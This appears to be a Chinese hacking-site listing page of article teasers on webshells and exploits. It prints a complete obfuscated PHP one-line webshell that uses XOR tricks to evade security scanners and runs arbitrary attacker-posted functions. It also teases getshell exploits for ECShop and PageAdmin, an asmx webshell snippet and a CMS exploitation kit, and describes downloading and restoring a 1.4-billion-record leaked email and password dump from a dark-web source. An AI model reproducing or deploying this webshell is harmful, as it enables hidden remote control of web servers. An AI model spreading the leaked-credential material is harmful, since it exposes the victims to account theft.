[置顶]超强ASP木马-RedHAt Webshell

[置顶]【国内首发】PHP木马-php_mof SHELL

过狗过盾的php一句话(非字母数字的)

代码比较简单,利用php异或(^)非字母数字生成后门,
详细的有关php异或的解释,参考:编写变态的(非字母数字的)PHP后门
文中提到的这种:
<?php
    @$_++; // $_ = 1
    $__=("#"^"|"); // $__ = _
    $__.=("."^"~"); // _P
    $__.=("/"^"`"); // _PO
    $__.=("|"^"/"); // _POS
    $__.=("{"^"/"); // _POST 
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

php-cgi解析漏洞 绕过云锁拦截

云锁拦截.jpg

asp过狗过最新版本D盾一句话(无意中得到的)

ECShop 2.x 3.0代码执行漏洞分析

0×00 前言ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。2.x版本跟3.0版本存在代码执行漏洞。0×01 漏洞原理ECShop 没有对 $GLOBAL[‘_SERVER’][‘HTTP_REFERER’] 变量进行验证,导致用户可以将任意代码插入的user_passport.dwt模板中,随后insert_mod根据模板内容动态执行相应的函数,用户插入恶意代码导致模板动态执行了lib_insert下的 insert_ads 方法,通过SQL注入,返回构造的执行代

pageadmin前台getshell 含漏洞利用工具

漏洞分析<% @ Page language="c#" Inherits="PageAdmin.uploads"%><!DOCTYPE htmlPUBLIC "-//W3C//DTD XHTML 1.0 Transi?onal//EN" "h?p://www.w3.org/TR/xhtml1/DTD/xhtml1-transi?onal.dtd">在uploads文件发现真实代码在pagead

国外14亿泄露数据下载及还原

 2018年6月10日freebuf发布了篇文章《14亿邮箱泄露密码明文信息查询网站惊现网络》,声称其泄露的数据可以通过暗网网站(http://dumpedlqezarfife.onion.lu/)进行查询,后续通过网络获取其泄露文件的下载地址,历经千辛万苦,终于将数据下载到本地,通过研究,将其txt文件进行还原处理,并对其进行无效数据处理,去除空密码等操作。1.1.1数据下载及分析1.数据下载地址(1)二进制未压缩41G磁力下载链接地址magnet:?xt=urn:btih:7ffb

曾黑掉天涯论坛,盗走马化腾QQ的16岁“菜霸”

那个16岁盗走马化腾QQ,还震惊央视的农村男孩,现在活得很成功!十几年前,还没有微博、微信、知乎。但在网络上却有这样一个无人不知,无人不晓的江湖——“天涯社区”,和它的名字一样,这里鱼龙混杂,又有情有义,有无数大神。当年的天涯孕育了一个又一个爆点:慕容雪村和他的《成都,今夜请将我遗忘》、芙蓉姐姐、奇葩小月月、天下霸唱和他的《鬼吹灯》……如今,论坛的黄金时代落下帷幕,逐渐走向衰落的天涯或许只能成为天涯“沦落人”共同的回忆,成为互联网历史中的一段传奇。而曾经火遍天涯的大神,也就此退隐江湖。其中有这样

.net下asmx一句话服务端两个

接力昨天的ashx一句话http://www.5kik.com/aspnews/646.html,今天放出的是基于webservice实现的一句话,另外还有asmx的小马 一并打包。<%@ WebService Language="JScript" class="ScriptMethodSpy"%>import System;import System.Web;import Syste

CMS漏洞检测和利用套件

CMSeeK是一个CMS的漏洞检测和利用套件。已发布版本- Version 1.0.1 [19-06-2018] - Version 1.0.0 [15-06-2018]Changelog文件特性支持20多种CMS的基本CMS检测高级Wordpress扫描版本检测用户检测(3种检测方法)查找版本漏洞等!模块化爆破系统 你可以根据需求选择自带爆破模块或自己创建模块并与之集成安装要求及兼容性:CMSeeK是由python

PHP使用流包装器实现WebShell

0×00 前言在Web安全领域WebShell的构造与查杀是永不停息的话题,这几天发现了一种新型方式生成WebShell,隐蔽度高,目前安全查杀软件没法检测到相关的后门漏洞,不同于 eval 或则 asset 等方式运行后门,对于这两个函数禁用的情况下一样适用,目前除了禁用相关函数还暂时没有相关方式来避免漏洞。0×01 后门原理在PHP开发中,我们使用最为频繁的指令大概就是 include 指令, include 指令中一些比较普通的文件包含漏洞我们就忽略了,先来看看一串代码:include&n